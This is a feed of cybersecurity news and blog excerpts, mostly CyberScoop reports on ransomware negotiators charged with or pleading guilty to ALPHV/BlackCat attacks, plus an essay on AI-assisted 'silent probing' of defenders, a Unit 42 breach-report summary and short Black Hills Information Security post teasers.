The case against Martino showcases an extreme, albeit rare, example of the dark underbelly of ransomware negotiation as a practice. The pitfalls of ransomware negotiation are excessive and these backchannel negotiations, which remain largely unscrutinized, can go awry for various reasons. 

Authorities seize about $12M in assets, set $500K bond

Martino is charged with conspiracy to interfere with commerce by extortion and faces up to 20 years in prison. He is scheduled to enter a plea March 19. 

Authorities seized nearly $9.2 million in five types of cryptocurrency from 21 wallets controlled by Martino. Other items seized from Martino include a 1999 Nissan Skyline, a 2024 Polaris RZR, a 2023 trailer and a 29-foot boat manufactured in 2023.

Officials also seized two properties owned by Martino in Nokomis, Florida, including a bayfront home with an estimated value of $1.68 million and a second single-family home with an estimated value of $396,000. The bayfront home was reported as the second-largest real estate transaction of the week when Martino and his wife purchased the home for $1.791 million in February 2024.

Aerial shot of the Nokomis, Florida property authorities seized from Angelo Martino. (Redfin)
Aerial shot of one of the Nokomis, Florida, properties authorities seized from Angelo Martino. (Redfin)

Martino surrendered to the U.S. Marshals in Miami Tuesday and was released on a $500,000 bond. He is restricted from traveling outside the Southern District of Florida and is prohibited from working in the cybersecurity industry.

ALPHV/BlackCat was a notorious ransomware and extortion group linked to a series of attacks on critical infrastructure providers. The ransomware variant first appeared in late 2021, and was later used in dozens of attacks on organizations in the health care sector.

The group behind the ransomware strain also claimed responsibility for the February 2024 attack on UnitedHealth Group subsidiary Change Healthcare, which paid a $22 million ransom and became the largest health care data breach on record, compromising data on about 190 million people.

Two of Martino’s alleged victims paid even higher ransoms in 2023, according to prosecutors, including a nearly $26.8 million payment from the unnamed nonprofit, and a nearly $25.7 million payment from the unnamed financial services company.

You can read the formal charge prosecutors filed against Martino below.

The post Feds say another DigitalMint negotiator ran ransomware attacks and helped extort $75 million appeared first on CyberScoop.

How ‘silent probing’ can make your security playbook a liability

By: Greg Otto
2 March 2026 at 06:00

For years, cyberattacks followed a familiar pattern: reconnaissance, exploitation, persistence, impact. Defenders built their strategies around that cycle, patching vulnerabilities, monitoring indicators, and working to reduce dwell time. But a quieter shift is underway.

Today’s most sophisticated adversaries are using AI to study how organizations defend themselves. They run what we call “silent probing campaigns:” long-term, subtle operations designed to map how a team detects threats, escalates issues, and responds under pressure. These campaigns focus on learning the defender’s habits, workflow and decision points so attackers can time and tailor follow-on actions to evade detection. This reframes cyber risk, turning it from a technical problem into a behavioral one.

From finding vulnerabilities to studying defenders

Historically, attackers focused solely on technical gaps, whether from an unpatched server, exposed credentials or a misconfigured cloud. The objective was to find the weakness and exploit it before someone else did. Silent probing adds a new “learning” phase to that playbook.

Attackers study how an organization responds as carefully as they study its systems. Using AI over weeks or months, they quietly measure detection and escalation speed, learn which alerts get ignored, and infer patterns like shift coverage, alert fatigue, and process bottlenecks.

Over time, these subtle probes generate data that feeds adaptive models. Those models help attackers learn what triggers a response, how quickly teams react, and where detection tends to falter. This means when a major attack finally unfolds, it has already been optimized against the organization’s real defensive patterns.

At the same time, organizations are embedding AI into their security operations, from automated triage to autonomous response orchestration. However, this shift introduces a new risk: the very systems designed to defend the enterprise can become part of the attack surface.

As organizations rely more heavily on AI to run their security operations, these systems need wide visibility and access to work properly. They often connect to cloud platforms, identity systems, and endpoint controls so they can detect threats and act quickly. But that level of access creates a substantial amount of power. If one of these AI-driven systems is compromised or manipulated, it doesn’t just expose a single tool, it can give an attacker broad reach across the environment. In that scenario, the technology designed to protect the organization can accelerate the damage.

Automation increases risk when AI systems can take action without human approval, such as  isolating devices, resetting passwords, or changing configurations.  Clear limits and guardrails are required, since manipulated inputs or faulty interpretations can trigger rapid wide-reaching disruption. Risk depends on the system’s authority and the controls around it.

AI hallucination in security operations can cause systems to misidentify threats, isolate the wrong assets or overlook the real threat. Repeated errors can erode trust in the system, or worse, create a false sense of confidence in its automated decisions. This affects judgment, decision-making, and how risk is understood in real time.

The risk of predictable defenses

Silent probing reveals how predictable an organization’s defenses are. Attackers are now looking for patterns in defensive behavior: response consistency across shifts, routinely ignored alerts, predictable incident response steps, and whether noisy tools accidentally hide slow-moving threats.

When defensive behavior becomes visible and predictable, it can be studied and exploited. Organizations need to understand how their defenses appear from the outside and assess their behavioral exposure the same way red teams test technical controls. This includes understanding how easily an outsider can identify detection thresholds, how clearly response times can be measured, and how much operational routine can be learned through quiet, repeated probing. The key question is whether patterns of response are unintentionally teaching attackers how to succeed.

Readiness in the age of AI

As AI plays a bigger role in security operations, oversight has to evolve alongside it. Strong governance starts with clearly defining what AI systems are allowed to do. Organizations need to be explicit about which actions can happen automatically and which require human approval. Conversely, least-privilege principles should apply not only to people, but also to machines. AI-driven tools should be tested regularly, reviewed for drift, bias, and inaccurate conclusions. Wherever possible, detection and response authority should be separated to avoid concentrating too much power in a single system. Centralization without control may feel efficient, but in practice, it creates fragility.

Still, policies and guardrails alone are not enough. As attackers use AI to understand defenders, defenders must sharpen their own ability to think like their adversaries. Security professionals need to evaluate how their tools perform and how they might be observed, manipulated, or misled. This requires questioning automated decisions, stepping in when necessary, and investigating anomalies—especially when the system appears confident in its conclusions.

This is why hands-on simulations and AI-focused red teaming matter. Teams need experience in environments that simulate adaptive adversaries who adjust their tactics based on defensive responses. not just textbook attack scenarios. They need to understand AI’s detection capabilities and the risks introduced by poor configurations or blind trust. The gap organizations face has become more cognitive than technological, and closing that gap requires continuous, measurable skill development, including AI literacy, offensive AI awareness, and the ability to critically evaluate automated outputs.

In an AI-first era, resilience now depends on how an organization defends itself like its being watched. Silent probing allows attackers to understand detection thresholds, escalation speed, and response consistency over weeks or months. and how consistently teams respond. This quiet observation can now serve a precursor to a major attack on an enterprise.

Security leaders need to focus on what their organizations reveal through day-to-day defensive behavior. When attackers can observe, learn, and adapt over time, predictable responses become a liability because they are easy to study and exploit.

Dimitrios Bougioukas is senior vice president of training at Hack The Box, where he leads the development of advanced training initiatives and certifications that equip cybersecurity professionals worldwide with mission-ready skills.

The post How ‘silent probing’ can make your security playbook a liability appeared first on CyberScoop.

Unit 42: Nearly two-thirds of breaches now start with identity abuse

17 February 2026 at 06:00

Identity is still the primary entry point for cyberattacks, according to Palo Alto Networks’ threat intelligence firm Unit 42. In its annual incident response report released Tuesday, Unit 42 found that identity-based techniques accounted for nearly two-thirds of all initial network intrusions last year. 

Social engineering was the leading attack method, accounting for one-third of the 750 incidents Unit 42 responded to in the one-year period ending in September 2025. Attackers also bypassed security controls with compromised credentials, brute-force attacks, overly permissive identity policies and insider threats, researchers said.

The persistent pitfalls of identity extended beyond initial access, with an identity-related element playing a critical role in nearly 90% of all incidents last year. Unit 42’s report highlights the explosive impact of identity abuse, and pins much of the problem on poor security controls and misconfigurations across interconnected tools and systems.

“Across the attack lifecycle, the biggest thing is that once you have an identity, you’ve got everything, you’ve got the key and you’re in,” Sam Rubin, senior vice president of consulting and threat intelligence at Unit 42, told CyberScoop. “From a defense standpoint, enterprises are still not very good at finding the signal in the noise, essentially the detection when an identity-based tactic is used because there isn’t unauthorized access per se from a technical telemetry standpoint, and it becomes a harder detection mechanism.”

Vulnerability exploits, an ever-moving target, were still prolific and accounted for 22% of initial intrusions across attacks, but humans remain the weakest link, Rubin said. 

The rise of machine-based identities and AI agents, which require an identity to take action, is expanding the attack surface for cybercriminals. Identity challenges are manifesting in the software supply chain as well, as API access and SaaS integrations become another weak link and way in for attackers if control keys aren’t properly controlled.

An attack on Salesloft Drift customers last summer highlighted how tightly integrated services can unravel and expose victims that are multiple layers removed from the vendor. More than 700 organizations were impacted directly, but Salesloft Drift’s integrations with dozens of third-party tools opened many additional paths of potential compromise. 

More broadly, attackers are jumping from branch offices into a victims’ headquarters or data centers because too many accounts remain over permissioned and cloud-based accounts are established with too much privilege or a lack of segmentation, Rubin said. 

These gaps allow threat groups to turn break-ins into significant attacks. 

“We just see this time and again that there could have been better identity-based practices that would have constrained the blast radius, even if it didn’t stop the initial access,” Rubin said. 

“It’s a problem of signal and noise,” he added. “Think about a global enterprise and all of this authenticated, legitimate activity happening every day. How do you see and identify the one instance where a user is already authenticated but doing something that they shouldn’t do?”

Large and older organizations are at a greater disadvantage, Rubin said. Over time, their technology stacks have evolved to include legacy systems acquired through various business deals. This leaves IT teams managing a patchwork of disparate systems that are poorly integrated, creating significant security vulnerabilities. 

“We forgot as defenders to consider the entire attack chain, because too often we see the defense happens in silos,” Rubin said, adding that attacks that pivot from endpoints to cloud-based services are commonly missed. 

Each of those jumps gives defenders a chance to  thwart attacks. Nearly 90% of the attacks Unit 42 investigated last year involved malicious activity across multiple attack surfaces.

Financially motivated attacks accounted for most of the 750 incidents Unit 42 responded to last year. Unit 42 did not say how many of those attacks resulted in payments, but it said median payments increased 87% year-over-year to $500,000 last year. 

Attackers continue to pick up speed as well, exfiltrating data from victim networks under a median duration of two days. Attackers stole data in under one hour in 22% of the attacks Unit 42 responded to last year. 

Unit 42’s annual look-back spotlights critical areas of concern and attack trends that continue to take root, yet it’s not comprehensive. The report’s visibility is limited to incidents that went from bad to worse and prompted victims to seek help from Unit 42. 

“The hardest thing about incident response in cybersecurity,” Rubin said, “is there is no one global spot for how much is going on.”

The post Unit 42: Nearly two-thirds of breaches now start with identity abuse appeared first on CyberScoop.

Former incident responders plead guilty to ransomware attack spree

19 December 2025 at 16:53

Former cybersecurity professionals Ryan Clifford Goldberg and Kevin Tyler Martin pleaded guilty Thursday to participating in a series of ransomware attacks in 2023 while they were employed at cybersecurity companies tasked with helping organizations respond to ransomware attacks.

Goldberg, who was a manager of incident response at Sygnia, and Martin, a ransomware negotiator at DigitalMint at the time, collaborated with an unnamed co-conspirator to attack victim computers and networks and use ALPHV, also known as BlackCat, ransomware to extort payments.

The plea deals mark a relatively quick turnaround as prosecutors successfully persuaded the pair to cop to their crimes less than three months after they were indicted in the U.S. District Court for the Southern District of Florida. Goldberg was arrested Sept. 22 and Martin was arrested Oct. 14. 

Goldberg and Martin confirmed in their respective plea agreements that the total losses caused by their crimes exceeded $9.5 million, according to federal court records. 

A spokesperson for DigitalMint said the company cooperated with the Justice Department throughout its investigation and supports the outcome as a step toward accountability. 

“We strongly condemn his actions, which were undertaken without the knowledge, permission or involvement of the company,” the spokesperson said in a statement. “His behavior is a clear violation of our values and ethical standards.”

Sygnia did not immediately respond to a request for comment.

Goldberg and Martin each pleaded guilty to one of the three counts brought against them — conspiracy to interfere with interstate commerce by extortion — effectively reducing their maximum penalty from 50 years in federal prison to 20 years. 

Victims impacted by the attacks over a six-month period in 2023 included a medical company based in Florida, a pharmaceutical company based in Maryland, a California doctor’s office, an engineering company based in California and a drone manufacturer in Virginia, according to the indictment.

Prosecutors said Goldberg, Martin and their co-conspirator received a nearly $1.3 million ransom payment from the medical company in May 2023, but did not successfully extort a financial payment from the other victims. 

Goldberg and Martin are each ordered to forfeit $342,000, which represents the value of proceeds traced to their crimes, according to their plea agreements. The court may also fine each of them up to $250,000 and additional restitution.

Officials said they will recommend reduced sentences for Goldberg and Martin as long as they make full, accurate and complete disclosures of their offenses and do not commit any further crimes. 

Goldberg and Martin “abused a position of public or private trust, or used a special skill, in a manner that significantly facilitated the commission or concealment” of their crimes, prosecutors said.

The unnamed co-conspirator, who also worked at DigitalMint, allegedly obtained an affiliate account on ALPHV, which the trio used to commit ransomware attacks.

ALPHV/BlackCat was a notorious ransomware and extortion group linked to a series of attacks on critical infrastructure providers. The ransomware variant first appeared in late 2021, and was later used in dozens of attacks on organizations in the health care sector.

The group behind the ransomware strain also claimed responsibility for last year’s attack on UnitedHealth Group subsidiary Change Healthcare, which paid a $22 million ransom and became the largest health care data breach on record, compromising data on about 190 million people.

The crew is alleged to have stopped operations in March 2024.

The post Former incident responders plead guilty to ransomware attack spree appeared first on CyberScoop.

Inside the BHIS SOC: A Conversation with Hayden Covington 

By: BHIS
3 December 2025 at 09:00

What happens when you ditch the tiered ticket queues and replace them with collaboration, agility, and real-time response? In this interview, Hayden Covington takes us behind the scenes of the BHIS Security Operations Center, which is where analysts don’t escalate tickets, they solve them.

The post Inside the BHIS SOC: A Conversation with Hayden Covington  appeared first on Black Hills Information Security, Inc..

Prosecutors allege incident response pros used ALPHV/BlackCat to commit string of ransomware attacks

3 November 2025 at 14:51

Federal prosecutors allege that three cybersecurity professionals, whose job was to help companies respond to ransomware attacks, instead carried out their own ransomware schemes against five U.S. businesses in 2023.

Ryan Clifford Goldberg, Kevin Tyler Martin and an unnamed co–conspirator — all U.S. nationals — began using ALPHV, also known as BlackCat, ransomware to attack companies in May 2023, according to indictments and other court documents in the U.S. District Court for the Southern District of Florida. 

At the time of the attacks, Goldberg was a manager of incident response at Sygnia, while Martin, a ransomware negotiator at DigitalMint, allegedly collaborated with Goldberg and another co-conspirator, who also worked at DigitalMint and allegedly obtained an affiliate account on ALPHV. 

The trio are accused of carrying out the conspiracy from May 2023 through April 2025, according to an affidavit. The Chicago Sun-Times was the first to report on the indictment.

Victims impacted by the attacks over a six-month period in 2023 included a medical company based in Florida, a pharmaceutical company based in Maryland, a California doctor’s office, an engineering company based in California and a drone manufacturer in Virginia. 

Goldberg, Martin and their co-conspirator received a nearly $1.3 million ransom payment from the medical company in May 2023, but did not successfully extort a financial payment from the other victims, prosecutors said. 

Sygnia confirmed Goldberg was formerly employed by the company. “Immediately upon learning of the situation, he was terminated,” the company said in a statement. 

Goldberg’s attorney declined to comment.

DigitalMint confirmed in a statement Monday that a former employee was indicted for organizing and participating in ransomware attacks. The company did not say when nor how it became aware of Martin and his co-worker’s alleged criminal activities, and did not describe the circumstances regarding the end of their employment.

“The charged conduct took place outside of DigitalMint’s infrastructure and systems. The co-conspirators did not access or compromise client data as part of the charged conduct,” the company said in a statement. “No one potentially involved in the charged scheme has worked at the company in over four months.”

ALPHV/BlackCat was a notorious ransomware and extortion group linked to a series of attacks on critical infrastructure providers. The ransomware variant first appeared in late 2021, and was later used in dozens of attacks on organizations in the health care sector. 

The group behind the ransomware strain also claimed responsibility for last year’s attack on UnitedHealth Group subsidiary Change Healthcare, which paid a $22 million ransom and became the largest health care data breach on record, compromising data on about 190 million people. 

Goldberg and Martin were both indicted Oct. 2 for conspiring to interfere with commerce by extortion, interference with commerce by extortion, and intentional damage to a protected computer. 

Martin was arrested Oct. 14 and freed on a $400,000 bond Oct. 24. He pleaded not guilty and is prohibited from working in cybersecurity awaiting trial. Martin’s attorney did not immediately respond to a request for comment.

Goldberg was arrested Sept. 22 and ordered to remain in custody pending trial due to flight risk. Goldberg and his wife boarded a one-way flight to Paris from Atlanta on June 27 and remained in Europe until Sept. 21. When Goldberg flew directly from Amsterdam to Mexico City, he was arrested upon landing and deported to the United States.

Court records show Goldberg allegedly confessed he was recruited by the unnamed co-conspirator to “try and ransom some companies” during an interview with the FBI June 17. The FBI seized his devices that day.

According to authorities, Goldberg allegedly admitted that he conducted the attacks to get out of debt. He also allegedly told FBI agents that he and his two accomplices successfully extorted a ransom payment from the medical company, which earned him a $200,000 share.

Martin and Goldberg each face a maximum penalty up to 50 years in federal prison.

You can read the full indictment below.

The post Prosecutors allege incident response pros used ALPHV/BlackCat to commit string of ransomware attacks appeared first on CyberScoop.

Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 2)

By: BHIS
1 October 2025 at 10:00

But what if we need to wrangle Windows Event Logs for more than one system? In part 2, we’ll wrangle EVTX logs at scale by incorporating Hayabusa and SOF-ELK into my rapid endpoint investigation workflow (“REIW”)! 

The post Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 2) appeared first on Black Hills Information Security, Inc..

Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 1)

By: BHIS
17 September 2025 at 10:09

In part 1 of this post, we’ll discuss how Hayabusa and “Security Operations and Forensics ELK” (SOF-ELK) can help us wrangle EVTX files (Windows Event Log files) for maximum effect during a Windows endpoint investigation!

The post Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 1) appeared first on Black Hills Information Security, Inc..

Stop Spoofing Yourself! Disabling M365 Direct Send

By: BHIS
20 August 2025 at 10:00

Remember the good ‘ol days of Zip drives, Winamp, the advent of “Office 365,” and copy machines that didn’t understand email authentication? Okay, maybe they weren’t so good! For a […]

The post Stop Spoofing Yourself! Disabling M365 Direct Send appeared first on Black Hills Information Security, Inc..

5 Things We Are Going to Continue to Ignore in 2025

By: BHIS
10 February 2025 at 11:00

In this video, John Strand discusses the complexities and challenges of penetration testing, emphasizing that it goes beyond just finding and exploiting vulnerabilities.

The post 5 Things We Are Going to Continue to Ignore in 2025 appeared first on Black Hills Information Security, Inc..

Monitoring High Risk Azure Logins 

By: BHIS
12 September 2024 at 10:44

Recently in the SOC, we were notified by a partner that they had a potential business email compromise, or BEC. We commonly catch these by identifying suspicious email forwarding rules, […]

The post Monitoring High Risk Azure Logins  appeared first on Black Hills Information Security, Inc..

❌
❌